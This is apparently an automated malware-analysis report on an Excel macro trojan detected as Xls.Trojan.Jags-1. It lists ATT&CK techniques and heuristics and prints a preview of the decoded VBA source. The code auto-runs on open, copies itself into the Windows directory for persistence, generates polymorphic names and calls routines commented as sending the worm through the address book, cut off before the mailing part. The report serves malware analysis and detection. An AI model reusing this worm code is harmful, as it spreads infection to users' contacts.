MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The critical ClamAV detections indicate this is a known malicious Excel macro trojan, likely Jags. The Workbook_Open macro is designed to execute VBA code upon opening, which includes calls to CreateObject and saving a copy of the workbook to the Windows directory. This suggests an attempt to establish persistence and potentially download or execute a second-stage payload.
Heuristics 5
-
ClamAV: Xls.Trojan.Jags-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Jags-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30551 bytes |
SHA-256: 3a3de0f4848e8272718cc7bb0fa79345e5e0021c342981b2319713f2c87559ff |
|||
|
Detection
ClamAV:
Xls.Trojan.Jags-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub happyBirthday()
On Error Resume Next
If Day(Now()) = 17 Then
Worksheets(1).Cells(7, 1).Value = "Colombia, September 17, 1978.."
Worksheets(1).Cells(6, 1).Value = "Happy Birthday to my brother Christiam (CJGS)"
With Worksheets(1).Cells(6, 1).Font
.Name = "Arial"
.Size = 20
End With
End If
End Sub
Sub Initialize()
On Error Resume Next
'nuestra tecnica polimorfica
Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
'mostramos el mensaje despúes, para no salvarlo en el savecopyas
Call happyBirthday
'desactivamos para entrar
Call UNLOAD_HOTKEYS
Call Ocultar_Barra
Call ASOCIAR_JAGS90
Call Read_Your_BookAddress 'ENVIAMOS EL GUSANO
'activamos para no dejar sospecha
Call LOAD_HOTKEYS
Call Mostrar_Barra
End Sub
Private Sub Workbook_Open()
If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
Call Initialize
End If
UserForm1.Show
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)
End Sub
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "get_win_directory"
'OBTENER EL DIRECTORIO WINDOWS
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Function OBTENER_DIR_WINDOWS() As String
On Error Resume Next
'OBTENER DIR WINDOWS
Dim WinDir As String
Dim Cadena As String
Dim ret As Long
'OBTENEMOS EL DIR
Cadena = String$(300, Chr$(0))
ret = GetWindowsDirectory(Cadena, Len(Cadena))
WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1)
OBTENER_DIR_WINDOWS = WinDir
End Function
Attribute VB_Name = "get_win_user"
'PARA OBTENER EL NOMBRE DE USUARIO DE WINDOWS
Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long
'OBTIENE EL NOMBRE DEL USUARIO ACTUAL DE WINDOWS
Public Function UsuarioActual() As String
On Error Resume Next
Dim sBuffer As String
Dim lSize As Long
Dim sUsuario As String
sBuffer = Space$(260)
lSize = Len(sBuffer)
Call GetUserName(sBuffer, lSize)
If lSize > 0 Then
sUsuario = Left$(sBuffer, lSize)
'Quitarle el CHR$(0) del final...
lSize = InStr(sUsuario, Chr$(0))
If lSize Then
sUsuario = Left$(sUsuario, lSize - 1)
End If
Else
sUsuario = Application.UserName
End If
UsuarioActual = sUsuario
End Function
Attribute VB_Name = "jags90_others"
'obtiene el nombre de la #$#%# base de datos
Function aleatorio(hasta As Integer) As Long
Dim x, num
num = 0
For x = 1 To hasta
Randomize
num = num + Rnd()
Next x
aleatorio = num
End Function
Function PolyName() As String
Dim texto, x, hasta
hasta = aleatorio(12) + 1
texto = " "
For x = 1 To hasta
Mid$(texto, x, 1) = Chr(aleatorio(23) + 64)
Next x
PolyName = texto
End Function
Attribute VB_Name = "read_address_book"
Function PolyBody() As S
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.